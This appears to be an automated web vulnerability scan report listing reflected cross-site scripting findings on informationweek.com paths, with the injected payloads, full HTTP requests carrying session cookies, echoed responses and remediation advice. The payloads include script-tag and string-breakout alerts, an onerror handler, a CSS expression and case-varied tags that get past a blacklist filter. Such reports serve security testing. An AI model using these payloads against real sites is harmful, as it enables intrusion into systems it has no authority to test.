HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:58 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:58 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 31413
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <IMG height=1 width=1 SRC="http://view.atdmt.com/action/MSFT_TechWeb_AE_ExtData/v3/atc1.informationweek/atc2.blog62bd0"><img src=a onerror=alert(1)>ecb015eff65/atc3./"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da15e'-alert(1)-'4d3e99808f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogda15e'-alert(1)-'4d3e99808f/main/archives/wolfes_den/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:59 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:59 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 31332
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main//blogda15e'-alert(1)-'4d3e99808f/main/archives/w;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=998296183;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89f73"><ScRiPt>alert(1)</ScRiPt>b9586f0a04a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /blog/main89f73"><ScRiPt>alert(1)</ScRiPt>b9586f0a04a/archives/wolfes_den/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:04 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:04 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 64739
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6778"><a>9ddab5d82b5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/main/archivesa6778"><a>9ddab5d82b5/wolfes_den/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:12 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:12 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 63621
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main/archivesa6778"><a>9ddab5d82b5/wolfes_den/index;kvarticleid=;kvauthor=;loc=300;grp=401528355" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20bcd</ScRiPt%20><a%20b%3dc>1fde3da0bf7 was submitted in the REST URL parameter 3. This input was echoed as 20bcd</ScRiPt ><a b=c>1fde3da0bf7 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /blog/main/archives20bcd</ScRiPt%20><a%20b%3dc>1fde3da0bf7/wolfes_den/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:25 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:25 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 63715
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main/archives20bcd</ScRiPt ><a b=c>1fde3da0bf7/wolfes;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=425228020;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8aebb'-alert(1)-'39925577aae was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/main/archives/wolfes_den8aebb'-alert(1)-'39925577aae/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:35 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:35 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 59100
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/wolfes_den8aebb'-alert(1)-'39925577aae/index;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=978005623;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 425a1"><a>15597961f2f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/main/archives/wolfes_den/index.html425a1"><a>15597961f2f HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:38 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:38 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 59262
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/wolfes_den/index425a1"><a>15597961f2f;kvarticleid=;kvauthor=;loc=300;grp=58870447" target="_blank"> ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3837f'-alert(1)-'9c80f4005af was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/main/archives/wolfes_den/index.html3837f'-alert(1)-'9c80f4005af HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:45 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:45 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 59524
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/wolfes_den/index3837f'-alert(1)-'9c80f4005af;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=715452107;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7dae'-alert(1)-'138347fb928 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cloud-computingc7dae'-alert(1)-'138347fb928/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:20:53 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:53 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 29988
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/cloud-computingc7dae'-alert(1)-'138347fb928/;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=767902195;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d15df"><script>alert(1)</script>0a7a7efc593 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cloud-computingd15df"><script>alert(1)</script>0a7a7efc593/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:20:51 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:51 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30261
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/cloud-computingd15df"><script>alert(1)</script>0a7a7efc593/;kvarticleid=;kvauthor=;loc=300;grp=201167065" target="_blank"> ...[SNIP]...
3.663. http://www.informationweek.com/cloud-computing/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.informationweek.com
Path:
/cloud-computing/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25ef7"><script>alert(1)</script>ea970e59d30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cloud-computing/?25ef7"><script>alert(1)</script>ea970e59d30=1 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:20:38 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:38 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 66425
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... <form method="post" name="submitPoll" action="/cloud-computing/index.jhtml?25ef7"><script>alert(1)</script>ea970e59d30=1&_DARGS=/cloud-computing/homepage_parts/showQuestionPoll.jhtml"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f086'-alert(1)-'ef99f8662cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /3f086'-alert(1)-'ef99f8662cb/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:20:54 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:54 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 29766
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/3f086'-alert(1)-'ef99f8662cb/;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=67429215;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bd76"><img%20src%3da%20onerror%3dalert(1)>a873248578 was submitted in the REST URL parameter 1. This input was echoed as 6bd76"><img src=a onerror=alert(1)>a873248578 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /6bd76"><img%20src%3da%20onerror%3dalert(1)>a873248578/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:20:52 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:52 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30040
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/6bd76"><img src=a onerror=alert(1)>a873248578/;kvarticleid=;kvauthor=;loc=300;grp=765593702" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 191d3'-alert(1)-'345263fe3a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /global-cio191d3'-alert(1)-'345263fe3a/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:20:27 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:27 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 29904
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/global-cio191d3'-alert(1)-'345263fe3a/;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=561276712;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a88f"><script>alert(1)</script>2669a8ee466 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /global-cio4a88f"><script>alert(1)</script>2669a8ee466/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:20:25 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:25 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30186
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/global-cio4a88f"><script>alert(1)</script>2669a8ee466/;kvarticleid=;kvauthor=;loc=300;grp=199227997" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c497"%20style%3dx%3aexpression(alert(1))%20c3944caa6b was submitted in the REST URL parameter 1. This input was echoed as 1c497" style=x:expression(alert(1)) c3944caa6b in the application's response.
